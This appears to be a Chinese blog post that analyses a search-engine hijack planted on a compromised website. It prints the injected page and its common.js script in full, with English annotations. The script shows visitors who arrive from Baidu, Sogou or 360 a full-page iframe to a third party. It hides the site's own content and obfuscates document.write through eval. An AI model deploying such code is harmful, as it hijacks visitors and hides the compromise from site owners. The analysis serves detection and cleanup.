网站页面挂恶意代码分析

不少企业或个人网站被人恶意挂了违规内容,劫持搜索流量,影响网站正常收录,同时可能涉及违法违规。
 
这类情况的典型表现是:直接输入网址访问时,网站可以正常浏览;但如果是从特定搜索引擎的搜索结果点击进入,页面就会加载被嵌入的第三方页面。
 
今天刚好看到这样一个页面,代码如下:

<!-- Analyst notes on the injected page (sample kept as captured):
     the static <title>/<meta> values and the title set by script differ, so a
     client that does not execute JavaScript reads different text from the one
     a normal browser user sees. -->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Runs before /common.js is loaded; this runtime title (company name masked
     by the author) is what common.js later reads from document.title. -->
<script>document.title='XXXXXX有限公司';</script>
<!-- The numeric character references below decode to
     "测试代码-chinae.org-站长联盟". The same string is repeated in the
     keywords and description meta tags. Entity encoding keeps the text out of
     reach of a plain-text search over the file. -->
<title>&#27979;&#35797;&#20195;&#30721;&#45;&#99;&#104;&#105;&#110;&#97;&#101;&#46;&#111;&#114;&#103;&#45;&#31449;&#38271;&#32852;&#30431;</title>
<meta name="keywords" content="&#27979;&#35797;&#20195;&#30721;&#45;&#99;&#104;&#105;&#110;&#97;&#101;&#46;&#111;&#114;&#103;&#45;&#31449;&#38271;&#32852;&#30431;" />
<meta name="description" content="&#27979;&#35797;&#20195;&#30721;&#45;&#99;&#104;&#105;&#110;&#97;&#101;&#46;&#111;&#114;&#103;&#45;&#31449;&#38271;&#32852;&#30431;" />
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<!-- Site-relative script include: the file is served from the compromised
     site itself, so it must be located and removed on the server. There is no
     opening <body> tag in this listing. -->
<script language="javascript" type="text/javascript" src="/common.js"></script>
测试页面
</body>
</html>


其中common.js代码如下:

// Referrer gate: runs as soon as common.js loads and decides, from
// document.referrer alone, whether to replace the visible page with a framed
// third-party page.

// Title at the time this file runs. The host page's inline script assigns
// document.title before including this file, so this is the value the overlay
// re-emits in its own <title>.
var titlestr = document.title;
// Candidate iframe destinations. Only one entry is present (host apparently
// masked by the author), so the random pick below always yields it.
var arr = ["http://www.xxxx.com:21008"];
// Referrer of the current navigation; an empty string on a direct visit.
var referer = document.referrer;
// Case-insensitive and unanchored. The dots are not escaped, so each "."
// matches any character and the pattern can match anywhere in the referrer
// string, not only in its hostname.
var regex=/(baidu.com|sogou.com|so.com)/i;
// Only visits whose referrer matches reach setFrame. An empty referrer never
// matches, which is why the owner sees a normal page when browsing directly.
// For triage, compare a direct load with one carrying a search-engine Referer.
if(regex.test(referer))
{
  setFrame(arr[Math.floor(Math.random() * arr.length)]);
}
/**
 * Overlays the current page with a full-size iframe pointing at `olink`,
 * then hides the page's own content.
 *
 * Searchable strings in this sample: the element ids "showcloneshengxiaon"
 * and "iconDiv1", and the keyword fragments that are concatenated at runtime
 * ("<ifr" + "ame", "do" + "cu" + "ment.wr" + "ite", "non" + "e").
 *
 * NOTE(review): eval and the cross-origin iframe are both blockable in the
 * browser by a Content-Security-Policy (script-src without 'unsafe-eval',
 * frame-src limited to the site's own origins). That limits the effect but
 * does not remove the injected file from the server.
 *
 * @param {string} olink - URL placed in the iframe's src attribute.
 */
function setFrame(olink) {
  // Markup for the overlay: a <title> carrying the saved page title, a white
  // 100% x 100% div holding the iframe, and CSS stretching html/body to 100%.
  // The tag name "iframe" is split across two literals, presumably so a plain
  // text search for "<iframe" does not hit this file.
  var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><ifr' + 'ame scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>';
  // Evaluates the source text "document.write('<markup>');". The call name is
  // assembled from fragments and run through eval, so "document.write" never
  // appears literally in this file.
  eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');");
  // This outer try only guards the setTimeout call itself, not the callback.
  try {
    setTimeout(function() {
      // Debug output left in by the author: number of direct <body> children.
      console.log(document.body.children.length);
      // Hide every direct child of <body> except the overlay div and an
      // element with id "iconDiv1" (not defined anywhere on this page).
      for (var i = 0; i < document.body.children.length; i++) {
        try {
          var a = document.body.children[i].tagName;
          var b = document.body.children[i].id;
          console.log(i + "***" + a + "**" + b);
          if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") {
            // "none" is also built from fragments.
            document.body.children[i].style.display = "non" + "e"
          }
        } catch(e) {}  // per-element errors are silently ignored
      }
      // Adds a viewport meta that pins the scale to 1 and disables user zoom.
      var oMeta = document.createElement('meta');
      oMeta.name = 'viewport';
      oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no';
      document.getElementsByTagName('head')[0].appendChild(oMeta);
    },
    // Delay in milliseconds before the hiding pass runs.
    100)
  } catch(e) {}
}